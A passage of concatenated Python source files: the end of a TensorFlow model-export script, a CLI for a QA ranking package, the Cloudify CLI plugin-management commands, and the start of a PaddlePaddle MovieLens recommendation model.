        #crop_resize_img,crop_resize_im_info = crop_resize_image(imageplaceholder_info, result_boxes)
        # output_crop_resize_img = tf.saved_model.utils.build_tensor_info(crop_resize_img)
        #output_crop_resize_img_info = tf.saved_model.utils.build_tensor_info(crop_resize_im_info)
        #----------
        '''
        # NOTE(review): 'detection_boxes' is a constant tensor computed from
        # the demo image above, not a function of the serving input — the
        # exported signature will always return those same boxes; confirm
        # this is intentional.
        result_boxes= np.array(result_boxes, dtype=np.float32)
        result_boxes= tf.convert_to_tensor(result_boxes)
        tensor_info_output_boxes = tf.saved_model.utils.build_tensor_info(result_boxes)
        prediction_post_signature = (
            tf.saved_model.signature_def_utils.build_signature_def(
                inputs={'images': tensor_info_input},
                outputs={'detection_boxes': tensor_info_output_boxes},
                #outputs={'detection_boxes': tensor_info_output_boxes,
                #         'resize_im_info':im_info_output,
                #         'crop_resize_img': output_crop_resize_img,
                #         'crop_resize_im_info': output_crop_resize_img_info,},
                method_name=tf.saved_model.signature_constants.PREDICT_METHOD_NAME
            ))
        builder.add_meta_graph_and_variables(
            sess, [tf.saved_model.tag_constants.SERVING],
            signature_def_map={
                # 'predict_images':prediction_signature,
                'predict_images_post': prediction_post_signature
            })
        builder.save(as_text=False)
# Build and export the SavedModel when run as a script.
if __name__ == '__main__':
    export()
|
<gh_stars>1-10
import logging
from zensols.actioncli import OneConfPerActionOptionsCliEnv
import zensols.dlqaclass.lsa
from zensols.dlqaclass import (
AppConfig,
QADataLoader,
QAModelManager,
Ranker,
)
class CorpusExec(object):
    """Actions that (re)build the corpus and its derived feature files."""

    def __init__(self, config):
        self.config = config
        self.dl = QADataLoader(self.config)
        # Deterministic shuffling for reproducible corpus processing.
        import random
        random.seed(0)

    def reparse_corpus(self):
        """Force a full reparse of the corpus."""
        self.dl.reparse(force=True, n_workers=10)

    def write_features(self):
        """Force regeneration of the feature files on disk."""
        self.dl.write_features(force=True, n_workers=20)
class ModelExec(object):
    """Train/test actions that delegate to the QA model manager."""

    def __init__(self, config):
        self.docmng = QAModelManager(config)

    def train(self):
        """Train a new model."""
        self.docmng.train()

    def test(self):
        """Evaluate the previously persisted model."""
        self.docmng.test(self.docmng.load_model())

    def train_test(self):
        """Train, then immediately evaluate the trained model."""
        self.train()
        self.test()
class RankExec(object):
    """Ranking actions: compute ranks and report MRR."""

    def __init__(self, config):
        self.ranker = Ranker(config)

    def compute_ranks(self):
        """Rank all questions across all paragraphs."""
        self.ranker.compute_ranks()

    def calculate_mrr(self):
        """Write the mean reciprocal rank based on computed ranks."""
        self.ranker.write_mrr()
class LsaExec(object):
    """Baseline LSA actions."""

    def __init__(self, config):
        self.mmng = zensols.dlqaclass.lsa.DocModelManager(config)

    def calculate_mrr(self):
        """Write the baseline LSA MRR."""
        # Touch the attribute first — presumably a lazy property that loads
        # the model before MRR can be written; confirm against DocModelManager.
        self.mmng.model
        self.mmng.write_mrr()
class ConfAppCommandLine(OneConfPerActionOptionsCliEnv):
    """Command line entry point mapping CLI actions to executor classes."""

    def __init__(self):
        # Declarative action table: each executor groups related actions,
        # and each action names the method invoked on that executor.
        cnf = {'executors':
               [{'name': 'exporter',
                 'executor': lambda params: CorpusExec(**params),
                 'actions': [{'name': 'parse',
                              'meth': 'reparse_corpus',
                              'doc': '(re)parse the corpus'},
                             {'name': 'features',
                              'meth': 'write_features',
                              'doc': 'write generated features to disk'}]},
                {'name': 'model',
                 'executor': lambda params: ModelExec(**params),
                 'actions': [{'name': 'train',
                              'doc': 'train the model'},
                             {'name': 'test',
                              'doc': 'test the model'},
                             {'name': 'traintest',
                              'meth': 'train_test',
                              'doc': 'train and test the model'}]},
                {'name': 'rank',
                 'executor': lambda params: RankExec(**params),
                 'actions': [{'name': 'calcrank',
                              'meth': 'compute_ranks',
                              'doc': 'rank all questions across all paragraphs'},
                             {'name': 'calcmrr',
                              'meth': 'calculate_mrr',
                              'doc': 'calculate the MRR based on computed ranks'}]},
                {'name': 'lsa',
                 'executor': lambda params: LsaExec(**params),
                 'actions': [{'name': 'lsammr',
                              'meth': 'calculate_mrr',
                              'doc': 'calculate the baseline LSA MRR'}]}],
               'config_option': {'name': 'config',
                                 'expect': True,
                                 'opt': ['-c', '--config', False,
                                         {'dest': 'config',
                                          'metavar': 'FILE',
                                          'help': 'configuration file'}]},
               'whine': 1}
        super(ConfAppCommandLine, self).__init__(
            cnf, config_env_name='dlqarc', pkg_dist='zensols.dlqaclass',
            no_os_environ=True, config_type=AppConfig)

    def _config_logging(self, level):
        """Configure root logging verbosity from the CLI whine ``level``."""
        root = logging.getLogger()
        # BUG FIX: `map` is lazy in Python 3, so the original
        # `map(root.removeHandler, root.handlers[:])` never removed anything;
        # iterate explicitly instead.
        for handler in root.handlers[:]:
            root.removeHandler(handler)
        if level == 0:
            levelno = logging.WARNING
        elif level == 1:
            levelno = logging.INFO
        else:
            # BUG FIX: any level >= 2 (or unexpected value) now maps to
            # DEBUG; previously a level outside {0, 1, 2} left `levelno`
            # unbound and raised UnboundLocalError.
            levelno = logging.DEBUG
        fmt = '%(levelname)s:%(asctime)-15s %(name)s: %(message)s'
        logging.basicConfig(format=fmt, level=levelno)
        root.setLevel(levelno)
        # Keep the framework's own logging quiet regardless of verbosity.
        logging.getLogger('zensols.actioncli').setLevel(level=logging.WARNING)
def main():
    """CLI entry point: build the command line and dispatch the action."""
    command_line = ConfAppCommandLine()
    command_line.invoke()
|
<reponame>Ilanad/cloudify-cli
########
# Copyright (c) 2018 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
############
import os
import time
import click
import wagon
from cloudify.models_states import PluginInstallationState
from cloudify_cli import execution_events_fetcher
from cloudify_cli.logger import get_events_logger
from cloudify_cli.exceptions import (
SuppressedCloudifyCliError, CloudifyCliError, CloudifyValidationError,
)
from cloudify_rest_client.constants import VISIBILITY_EXCEPT_PRIVATE
from cloudify_rest_client.exceptions import CloudifyClientError
from .. import utils
from ..logger import get_global_json_output
from ..table import print_data, print_single, print_details
from ..cli import helptexts, cfy
from ..utils import (prettify_client_error,
get_visibility,
validate_visibility)
# Columns displayed for plugin entries (`cfy plugins list` / `get`).
PLUGIN_COLUMNS = ['id', 'package_name', 'package_version', 'installed on',
                  'distribution', 'distribution_release', 'uploaded_at',
                  'visibility', 'tenant_name', 'created_by',
                  'yaml_url_path']
# Columns displayed for plugins-update entries (`history` / `get-update`).
PLUGINS_UPDATE_COLUMNS = ['id', 'state', 'blueprint_id', 'temp_blueprint_id',
                          'execution_id', 'deployments_to_update',
                          'visibility', 'created_at', 'forced']
# Extra columns appended when the --get-data flag is passed.
GET_DATA_COLUMNS = ['file_server_path', 'supported_platform',
                    'supported_py_versions']
# Root click group for all `cfy plugins ...` subcommands defined below.
@cfy.group(name='plugins')
@cfy.options.common_options
def plugins():
    """Handle plugins on the manager
    """
    pass
@plugins.command(name='validate',
                 short_help='Validate a plugin')
@cfy.argument('plugin-path')
@cfy.options.common_options
@cfy.pass_logger
def validate(plugin_path, logger):
    """Validate a plugin
    This will try to validate the plugin's archive is not corrupted.
    A valid plugin is a wagon (http://github.com/cloudify-cosomo/wagon)
    in the tar.gz format.
    `PLUGIN_PATH` is the path to wagon archive to validate.
    """
    logger.info('Validating plugin {0}...'.format(plugin_path))
    # wagon.validate raises on a corrupted/invalid archive; no manager needed.
    wagon.validate(plugin_path)
    logger.info('Plugin validated successfully')
@plugins.command(name='delete',
                 short_help='Delete a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.force(help=helptexts.FORCE_DELETE_PLUGIN)
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def delete(plugin_id, force, logger, client, tenant_name):
    """Delete a plugin from the manager
    `PLUGIN_ID` is the id of the plugin to delete.
    """
    utils.explicit_tenant_name_message(tenant_name, logger)
    logger.info('Deleting plugin {0}...'.format(plugin_id))
    # `force` deletes the plugin even if it is in use (see FORCE_DELETE_PLUGIN).
    client.plugins.delete(plugin_id=plugin_id, force=force)
    logger.info('Plugin deleted')
@plugins.command(name='upload',
                 short_help='Upload a plugin [manager only]')
@cfy.argument('plugin-path')
@cfy.options.plugin_yaml_path()
@cfy.options.plugin_icon_path()
@cfy.options.plugin_title()
@cfy.options.private_resource
@cfy.options.visibility()
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.pass_context
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def upload(ctx,
           plugin_path,
           yaml_path,
           icon_path,
           title,
           private_resource,
           visibility,
           logger,
           client,
           tenant_name):
    """Upload a plugin to the manager
    `PLUGIN_PATH` is the path to wagon archive to upload.
    """
    # Uploading requires a valid manager license.
    client.license.check()
    # Test whether the path is a valid URL. If it is, no point in doing local
    # validations - it will be validated on the server side anyway
    utils.explicit_tenant_name_message(tenant_name, logger)
    logger.info('Creating plugin zip archive..')
    # get_local_path downloads remote paths to local temp files, so every
    # entry in zip_files is a local file that must be cleaned up afterwards.
    wagon_path = utils.get_local_path(plugin_path, create_temp=True)
    yaml_path = utils.get_local_path(yaml_path, create_temp=True)
    zip_files = [wagon_path, yaml_path]
    zip_descr = 'wagon + yaml'
    if icon_path:
        # The manager expects the icon under the fixed name 'icon.png'.
        icon_path = utils.get_local_path(icon_path,
                                         destination='icon.png',
                                         create_temp=True)
        zip_files.append(icon_path)
        zip_descr += ' + icon'
    zip_path = utils.zip_files(zip_files)
    progress_handler = utils.generate_progress_handler(zip_path, '')
    visibility = get_visibility(private_resource, visibility, logger)
    logger.info('Uploading plugin archive (%s)..', zip_descr)
    try:
        plugin = client.plugins.upload(zip_path,
                                       plugin_title=title,
                                       visibility=visibility,
                                       progress_callback=progress_handler)
        logger.info("Plugin uploaded. Plugin's id is {0}".format(plugin.id))
    finally:
        # Always remove the temp files and the assembled zip, even if the
        # upload failed.
        for f in zip_files:
            os.remove(f)
        os.remove(zip_path)
@plugins.command(name='bundle-upload',
                 short_help='Upload a bundle of plugins [manager only]')
@cfy.options.plugins_bundle_path
@cfy.pass_client()
@cfy.pass_logger
def upload_caravan(client, logger, path):
    # Uploading a bundle requires a valid manager license.
    client.license.check()
    if not path:
        # No explicit bundle given: fall back to the public plugins bundle.
        logger.info("Starting upload of plugins bundle, "
                    "this may take few minutes to complete.")
        path = 'http://repository.cloudifysource.org/' \
               'cloudify/wagons/cloudify-plugins-bundle.tgz'
    progress = utils.generate_progress_handler(path, '')
    plugins_ = client.plugins.upload(path, progress_callback=progress)
    logger.info("Bundle uploaded, {0} Plugins installed."
                .format(len(plugins_)))
    if len(plugins_) > 0:
        ids = '\n'.join(p.id for p in plugins_)
        logger.info("The plugins' ids are:\n{0}\n".format(ids))
@plugins.command(name='download',
                 short_help='Download a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.output_path
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.pass_logger
@cfy.pass_client()
def download(plugin_id, output_path, logger, client, tenant_name):
    """Download a plugin from the manager
    `PLUGIN_ID` is the id of the plugin to download.
    """
    utils.explicit_tenant_name_message(tenant_name, logger)
    logger.info('Downloading plugin {0}...'.format(plugin_id))
    # The progress bar is labeled with the target path, or the id if no
    # explicit output path was given.
    plugin_name = output_path if output_path else plugin_id
    progress_handler = utils.generate_progress_handler(plugin_name, '')
    target_file = client.plugins.download(plugin_id,
                                          output_path,
                                          progress_handler)
    logger.info('Plugin downloaded as {0}'.format(target_file))
def _format_installation_state(plugin):
"""Format the 'installation_state' into a human-readable 'installed on'"""
if not plugin.get('installation_state'):
return ''
agents = 0
managers = 0
errors = 0
for state in plugin['installation_state']:
if state['state'] == PluginInstallationState.ERROR:
errors += 1
elif state['state'] != PluginInstallationState.INSTALLED:
continue
if state.get('manager'):
managers += 1
elif state.get('agent'):
agents += 1
parts = []
if managers:
parts.append('{0} managers'.format(managers))
if agents:
parts.append('{0} agents'.format(agents))
if errors:
parts.append('{0} errors'.format(errors))
return ', '.join(parts)
@plugins.command(name='get',
                 short_help='Retrieve plugin information [manager only]')
@cfy.argument('plugin-id')
@cfy.options.common_options
@cfy.options.get_data
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def get(plugin_id, logger, client, tenant_name, get_data):
    """Retrieve information for a specific plugin
    `PLUGIN_ID` is the id of the plugin to get information on.
    """
    utils.explicit_tenant_name_message(tenant_name, logger)
    logger.info('Retrieving plugin {0}...'.format(plugin_id))
    plugin = client.plugins.get(plugin_id, _get_data=get_data)
    columns = PLUGIN_COLUMNS + GET_DATA_COLUMNS if get_data else PLUGIN_COLUMNS
    # Replace the raw state list with a human-readable summary column.
    plugin['installed on'] = _format_installation_state(plugin)
    if get_global_json_output():
        # for json, also include installation_state because it's useful
        print_single(columns + ['installation_state'], plugin, 'Plugin:', 50)
        return
    # Tabular output: show per-manager/per-agent states as a separate table.
    states = {}
    for state in plugin.pop('installation_state', []):
        if state.get('manager'):
            label = 'Manager {0}'.format(state['manager'])
        elif state.get('agent'):
            label = 'Agent {0}'.format(state['agent'])
        states[label] = state['state']
    print_details({
        col: plugin.get(col) for col in columns
    }, 'Plugin:')
    print_details(states, 'Plugin installation state:')
@plugins.command(name='list',
                 short_help='List plugins [manager only]')
@cfy.options.sort_by('uploaded_at')
@cfy.options.descending
@cfy.options.tenant_name_for_list(
    required=False, resource_name_for_help='plugin')
@cfy.options.all_tenants
@cfy.options.search
@cfy.options.common_options
@cfy.options.get_data
@cfy.options.pagination_offset
@cfy.options.pagination_size
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
# NOTE(review): shadows the builtin `list`; the name is part of the click
# command registration, so it is kept as-is.
def list(sort_by,
         descending,
         tenant_name,
         all_tenants,
         search,
         pagination_offset,
         pagination_size,
         logger,
         client,
         get_data):
    """List all plugins on the manager
    """
    utils.explicit_tenant_name_message(tenant_name, logger)
    logger.info('Listing all plugins...')
    plugins_list = client.plugins.list(sort=sort_by,
                                       is_descending=descending,
                                       _all_tenants=all_tenants,
                                       _search=search,
                                       _get_data=get_data,
                                       _offset=pagination_offset,
                                       _size=pagination_size)
    # Replace each raw state list with a human-readable summary column.
    for plugin in plugins_list:
        plugin['installed on'] = _format_installation_state(plugin)
    columns = PLUGIN_COLUMNS + GET_DATA_COLUMNS if get_data else PLUGIN_COLUMNS
    if get_global_json_output():
        columns += ['installation_state']
    print_data(columns, plugins_list, 'Plugins:')
    total = plugins_list.metadata.pagination.total
    logger.info('Showing {0} of {1} plugins'.format(len(plugins_list),
                                                    total))
def _wait_for_plugin_to_be_installed(client, plugin_id, managers, agents,
                                     timeout, logger):
    """Poll the manager until the plugin is installed on all targets.

    Polls once per second, removing each manager/agent from the wait sets as
    it reaches INSTALLED or ERROR. Raises CloudifyCliError on timeout, or
    after the wait if any target ended in an error state.
    """
    logger.info(
        'Waiting for plugin %s to be installed on the managers: [%s] '
        'and agents: [%s]',
        plugin_id, ', '.join(managers), ', '.join(agents)
    )
    wait_managers = set(managers)
    wait_agents = set(agents)
    errors = 0
    deadline = time.time() + timeout
    while time.time() < deadline:
        for pstate in client.plugins.get(plugin_id)['installation_state']:
            if pstate['state'] == PluginInstallationState.INSTALLED:
                if pstate.get('manager') in wait_managers:
                    wait_managers.remove(pstate['manager'])
                    logger.info('Finished installing on manager %s',
                                pstate['manager'])
                if pstate.get('agent') in wait_agents:
                    wait_agents.remove(pstate['agent'])
                    logger.info('Finished installing on agent %s',
                                pstate['agent'])
            if pstate['state'] == PluginInstallationState.ERROR:
                # Errored targets stop being waited on, but are counted so
                # the command can fail after the wait completes.
                if pstate.get('manager') in wait_managers:
                    errors += 1
                    wait_managers.remove(pstate['manager'])
                    logger.info('Error installing on manager %s: %s',
                                pstate['manager'], pstate['error'])
                if pstate.get('agent') in wait_agents:
                    errors += 1
                    wait_agents.remove(pstate['agent'])
                    logger.info('Error installing on agent %s: %s',
                                pstate['agent'], pstate['error'])
        if not wait_managers and not wait_agents:
            break
        time.sleep(1)
    else:
        # while/else: reached only when the deadline expired without break.
        raise CloudifyCliError(
            'Timed out waiting for plugin {0} to be installed on managers: '
            '[{1}] and agents: [{2}]'
            .format(plugin_id,
                    ', '.join(managers),
                    ', '.join(agents))
        )
    if errors:
        raise CloudifyCliError('Encountered errors while installing plugins')
@plugins.command(name='install',
                 short_help='Install a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.common_options
@click.option('--manager-hostname', multiple=True,
              help='The hostname of the manager to install the plugin on '
                   '(can be passed multiple times)')
@click.option('--agent-name', multiple=True,
              help='The name of the agent to install the plugin on'
                   '(can be passed multiple times)')
@cfy.options.timeout(300)
@cfy.pass_client()
@cfy.pass_logger
def install(plugin_id, manager_hostname, agent_name, timeout, client, logger):
    """Install the plugin on the given managers and agents.
    Force plugin installation before it needs to be used.
    If manager hostnames and agent names are not provided, default to
    installing on all managers.
    This will wait for the plugins to be installed, up to timeout seconds.
    """
    if not manager_hostname and not agent_name:
        # No explicit targets: install on every manager in the cluster.
        manager_hostname = [
            manager.hostname for manager in client.manager.get_managers()
        ]
    client.plugins.install(
        plugin_id,
        agents=agent_name,
        managers=manager_hostname
    )
    # Block until every requested target reports installed (or errored).
    _wait_for_plugin_to_be_installed(
        client, plugin_id, manager_hostname, agent_name, timeout, logger)
@plugins.command(name='set-global',
                 short_help="Set the plugin's visibility to global")
@cfy.argument('plugin-id')
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client(use_tenant_in_header=True)
@cfy.pass_logger
def set_global(plugin_id, logger, client):
    """Set the plugin's visibility to global
    `PLUGIN_ID` is the id of the plugin to set global
    """
    # Pretty-print expected REST failures instead of raw tracebacks.
    status_codes = [400, 403, 404]
    with prettify_client_error(status_codes, logger):
        client.plugins.set_global(plugin_id)
        logger.info('Plugin `{0}` was set to global'.format(plugin_id))
        logger.info("This command will be deprecated soon, please use the "
                    "'set-visibility' command instead")
@plugins.command(name='set-visibility',
                 short_help="Set the plugin's visibility")
@cfy.argument('plugin-id')
@cfy.options.visibility(required=True, valid_values=VISIBILITY_EXCEPT_PRIVATE)
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client(use_tenant_in_header=True)
@cfy.pass_logger
def set_visibility(plugin_id, visibility, logger, client):
    """Set the plugin's visibility
    `PLUGIN_ID` is the id of the plugin to update
    """
    # Visibility can only be widened: 'private' is rejected here.
    validate_visibility(visibility, valid_values=VISIBILITY_EXCEPT_PRIVATE)
    # Pretty-print expected REST failures instead of raw tracebacks.
    status_codes = [400, 403, 404]
    with prettify_client_error(status_codes, logger):
        client.plugins.set_visibility(plugin_id, visibility)
        logger.info('Plugin `{0}` was set to {1}'.format(plugin_id,
                                                         visibility))
@plugins.command(name='update',
                 short_help='Update the plugins of all the deployments of '
                            'the blueprint [manager only]')
@cfy.argument('blueprint-id', required=False)
@cfy.options.all_blueprints
@cfy.options.all_tenants
@cfy.options.except_blueprints
@cfy.options.plugin_names
@cfy.options.plugins_to_latest
@cfy.options.plugins_all_to_latest
@cfy.options.plugins_to_minor
@cfy.options.plugins_all_to_minor
@cfy.options.common_options
@cfy.options.tenant_name(required=False,
                         mutually_exclusive_with=['all_tenants'],
                         resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.options.include_logs
@cfy.options.json_output
@cfy.pass_logger
@cfy.pass_client()
@cfy.options.force(help=helptexts.FORCE_PLUGINS_UPDATE)
@cfy.options.auto_correct_types
@cfy.options.reevaluate_active_statuses(help=helptexts.
                                        REEVALUATE_ACTIVE_STATUSES_PLUGINS)
def update(blueprint_id,
           all_blueprints,
           all_tenants,
           except_blueprints,
           plugin_names,
           to_latest,
           all_to_latest,
           to_minor,
           all_to_minor,
           include_logs,
           json_output,
           logger,
           client,
           tenant_name,
           force,
           auto_correct_types,
           reevaluate_active_statuses):
    """Update the plugins of all the deployments of the given blueprint
    or any blueprint in case `--all-blueprints` flag was used instead of
    providing a BLUEPRINT_ID. This will update the deployments one by one
    until all succeeded.
    """
    # Validate input arguments
    # Exactly one of BLUEPRINT_ID / --all-blueprints must be given.
    if ((blueprint_id and all_blueprints) or
            (not blueprint_id and not all_blueprints)):
        raise CloudifyValidationError(
            'ERROR: Invalid command syntax. Either provide '
            'a BLUEPRINT_ID or use --all-blueprints flag.')
    if except_blueprints and not all_blueprints:
        raise CloudifyValidationError(
            'ERROR: Invalid command syntax. Cannot list blueprints '
            'exceptions unless used with --all-blueprints flag.')
    # --all-to-latest defaults to on unless --all-to-minor was requested;
    # the two "all" modes are mutually exclusive.
    all_to_minor = bool(all_to_minor)
    if all_to_latest is None:
        all_to_latest = not all_to_minor
    if (all_to_latest and all_to_minor) or \
            (not all_to_latest and not all_to_minor):
        raise CloudifyValidationError(
            'ERROR: Invalid command syntax. --all-to-latest and '
            '--all-to-minor are mutually exclusive.')
    # Per-plugin options cannot be combined with the matching "all" mode.
    if to_latest and all_to_latest:
        raise CloudifyValidationError(
            'ERROR: Invalid command syntax. --all-to-latest and '
            '--to-latest are mutually exclusive. If you want to upgrade '
            'only the specific plugins, use --plugin-name parameter instead.')
    if to_minor and all_to_minor:
        raise CloudifyValidationError(
            'ERROR: Invalid command syntax. --all-to-minor and '
            '--to-minor are mutually exclusive. If you want to upgrade '
            'only the specific plugins, use --plugin-name parameter instead.')
    utils.explicit_tenant_name_message(tenant_name, logger)
    if blueprint_id:
        # Single-blueprint mode: any failure propagates to the caller.
        _update_a_blueprint(blueprint_id, plugin_names,
                            to_latest, all_to_latest, to_minor, all_to_minor,
                            include_logs, json_output, logger,
                            client, force, auto_correct_types,
                            reevaluate_active_statuses)
    elif all_blueprints:
        # All-blueprints mode: page through blueprints, updating each one
        # and collecting per-blueprint success/failure instead of aborting.
        update_results = {'successful': [], 'failed': []}
        pagination_offset = 0
        while True:
            blueprints = client.blueprints.list(
                sort='created_at',
                _all_tenants=all_tenants,
                _offset=pagination_offset,
            )
            for blueprint in blueprints:
                if blueprint.id in except_blueprints:
                    continue
                try:
                    _update_a_blueprint(blueprint.id, plugin_names,
                                        to_latest, all_to_latest,
                                        to_minor, all_to_minor,
                                        include_logs, json_output, logger,
                                        client, force, auto_correct_types,
                                        reevaluate_active_statuses)
                    update_results['successful'].append(blueprint.id)
                except CloudifyClientError as ex:
                    update_results['failed'].append(blueprint.id)
                    logger.warning('Error during %s blueprint update. %s',
                                   blueprint.id, ex)
            pagination_offset += blueprints.metadata.pagination.size
            # Stop when the last (possibly short) page has been processed.
            if len(blueprints) < blueprints.metadata.pagination.size or \
                    0 == blueprints.metadata.pagination.size:
                break
        if update_results['successful']:
            logger.info('Successfully updated %d blueprints.',
                        len(update_results['successful']))
        if update_results['failed']:
            logger.error('Failed updating %d blueprints.',
                         len(update_results['failed']))
            logger.error('Failed blueprints: %s.',
                         ', '.join(update_results['failed']))
def _update_a_blueprint(blueprint_id,
                        plugin_names,
                        to_latest,
                        all_to_latest,
                        to_minor,
                        all_to_minor,
                        include_logs,
                        json_output,
                        logger,
                        client,
                        force,
                        auto_correct_types,
                        reevaluate_active_statuses):
    """Start a plugins-update for one blueprint and wait for its execution.

    Raises SuppressedCloudifyCliError if the update workflow ends in error
    (details are logged before raising).
    """
    logger.info('Updating the plugins of the deployments of the blueprint '
                '{}'.format(blueprint_id))
    plugins_update = client.plugins_update.update_plugins(
        blueprint_id, force=force, plugin_names=plugin_names,
        to_latest=to_latest, all_to_latest=all_to_latest,
        to_minor=to_minor, all_to_minor=all_to_minor,
        auto_correct_types=auto_correct_types,
        reevaluate_active_statuses=reevaluate_active_statuses,
    )
    # Stream the workflow's events until it finishes (no client-side timeout).
    events_logger = get_events_logger(json_output)
    execution = execution_events_fetcher.wait_for_execution(
        client,
        client.executions.get(plugins_update.execution_id),
        events_handler=events_logger,
        include_logs=include_logs,
        timeout=None  # don't timeout ever
    )
    if execution.error:
        logger.info("Execution of workflow '{0}' for blueprint "
                    "'{1}' failed. [error={2}]"
                    .format(execution.workflow_id,
                            blueprint_id,
                            execution.error))
        logger.info('Failed updating plugins for blueprint {0}. '
                    'Plugins update ID: {1}. Execution id: {2}'
                    .format(blueprint_id,
                            plugins_update.id,
                            execution.id))
        # Details were already logged; suppress the traceback.
        raise SuppressedCloudifyCliError()
    logger.info("Finished executing workflow '{0}'".format(
        execution.workflow_id))
    logger.info('Successfully updated plugins for blueprint {0}. '
                'Plugins update ID: {1}. Execution id: {2}'
                .format(blueprint_id,
                        plugins_update.id,
                        execution.id))
@plugins.command(
    name='get-update',
    short_help='Retrieve plugins update information [manager only]'
)
@cfy.argument('plugins-update-id')
@cfy.options.common_options
@cfy.options.tenant_name(required=False,
                         resource_name_for_help='plugins update')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def manager_get_update(plugins_update_id, logger, client, tenant_name):
    """Retrieve information for a specific plugins update
    `PLUGINS_UPDATE_ID` is the id of the plugins update to get information on.
    """
    utils.explicit_tenant_name_message(tenant_name, logger)
    logger.info('Retrieving plugins update {0}...'.format(plugins_update_id))
    plugins_update_dict = client.plugins_update.get(plugins_update_id)
    print_single(
        PLUGINS_UPDATE_COLUMNS, plugins_update_dict, 'Plugins update:')
@plugins.command(name='history', short_help='List plugins updates '
                                            '[manager only]')
@cfy.options.blueprint_id()
@cfy.options.sort_by()
@cfy.options.descending
@cfy.options.tenant_name_for_list(
    required=False, resource_name_for_help='plugins update')
@cfy.options.all_tenants
@cfy.options.search
@cfy.options.pagination_offset
@cfy.options.pagination_size
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def manager_history(blueprint_id,
                    sort_by,
                    descending,
                    all_tenants,
                    search,
                    pagination_offset,
                    pagination_size,
                    logger,
                    client,
                    tenant_name):
    """Show blueprint history by listing plugins updates
    If `--blueprint-id` is provided, list plugins updates for that
    blueprint. Otherwise, list plugins updates for all blueprints.
    """
    utils.explicit_tenant_name_message(tenant_name, logger)
    if blueprint_id:
        logger.info('Listing plugins updates for blueprint {0}...'.format(
            blueprint_id))
    else:
        logger.info('Listing all plugins updates...')
    # blueprint_id=None lists updates across all blueprints.
    plugins_updates = client.plugins_update.list(
        sort=sort_by,
        is_descending=descending,
        _all_tenants=all_tenants,
        _search=search,
        _offset=pagination_offset,
        _size=pagination_size,
        blueprint_id=blueprint_id
    )
    total = plugins_updates.metadata.pagination.total
    print_data(
        PLUGINS_UPDATE_COLUMNS, plugins_updates, 'Plugins updates:')
    logger.info('Showing {0} of {1} plugins updates'.format(
        len(plugins_updates), total))
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Authors: fuqiang(<EMAIL>)
Date: 2017/11/29
使用paddle框架实现个性化电影推荐系统的模型训练和参数输出保存,关键步骤如下:
1.初始化
2.配置网络结构和设置参数:
- 构造用户融合特征模型
- 构造电影融合特征模型
- 定义特征相似性度量inference
- 成本函数cost
- 创建parameters
- 定义feeding
3.定义event_handler
4.定义trainer
5.开始训练
6.展示cost曲线plot_costs()
"""
import numpy as np
import matplotlib
# BUG FIX: the backend must be selected BEFORE matplotlib.pyplot is
# imported; calling matplotlib.use('Agg') after the pyplot import (as the
# original code did) has no effect because the backend is already chosen
# at pyplot import time.
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import paddle.v2 as paddle

# Global training-step counter — presumably incremented by the training
# event handler defined later in this file; confirm against its usage.
LEARNING_STEP = 0
def get_usr_combined_features():
    """Build the user-side feature model.

    Reads four categorical inputs from the MovieLens dataset --
    user_id, gender_id, age_id and job_id -- embeds each one, passes
    each embedding through its own fully connected layer, then fuses
    everything into a single 200-dimensional Tanh FC layer.

    Return:
        usr_combined_features -- the fused user feature layer.
    """
    # user_id: 32-d embedding followed by a 32-unit FC projection.
    uid_input = paddle.layer.data(
        name='user_id',
        type=paddle.data_type.integer_value(
            paddle.dataset.movielens.max_user_id() + 1))
    uid_emb = paddle.layer.embedding(input=uid_input, size=32)
    uid_fc = paddle.layer.fc(input=uid_emb, size=32)
    # gender_id (binary): 16-d embedding + FC projection.
    gender_input = paddle.layer.data(
        name='gender_id', type=paddle.data_type.integer_value(2))
    gender_emb = paddle.layer.embedding(input=gender_input, size=16)
    gender_fc = paddle.layer.fc(input=gender_emb, size=16)
    # age_id: 16-d embedding + FC projection.
    age_input = paddle.layer.data(
        name='age_id',
        type=paddle.data_type.integer_value(
            len(paddle.dataset.movielens.age_table)))
    age_emb = paddle.layer.embedding(input=age_input, size=16)
    age_fc = paddle.layer.fc(input=age_emb, size=16)
    # job_id: 16-d embedding + FC projection.
    job_input = paddle.layer.data(
        name='job_id',
        type=paddle.data_type.integer_value(
            paddle.dataset.movielens.max_job_id() + 1))
    job_emb = paddle.layer.embedding(input=job_input, size=16)
    job_fc = paddle.layer.fc(input=job_emb, size=16)
    # Fuse all per-feature projections into one 200-d Tanh layer.
    return paddle.layer.fc(
        input=[uid_fc, gender_fc, age_fc, job_fc],
        size=200,
        act=paddle.activation.Tanh())
def get_mov_combined_features():
    """Build the movie-side feature model.

    Combines three inputs -- movie_id, category_id and movie_title --
    into a single 200-dimensional feature: ids are embedded and
    projected, categories go through an FC layer, and the title word
    sequence goes through an embedding plus a conv-pooling network.

    Return:
        mov_combined_features -- the fused movie feature layer.
    """
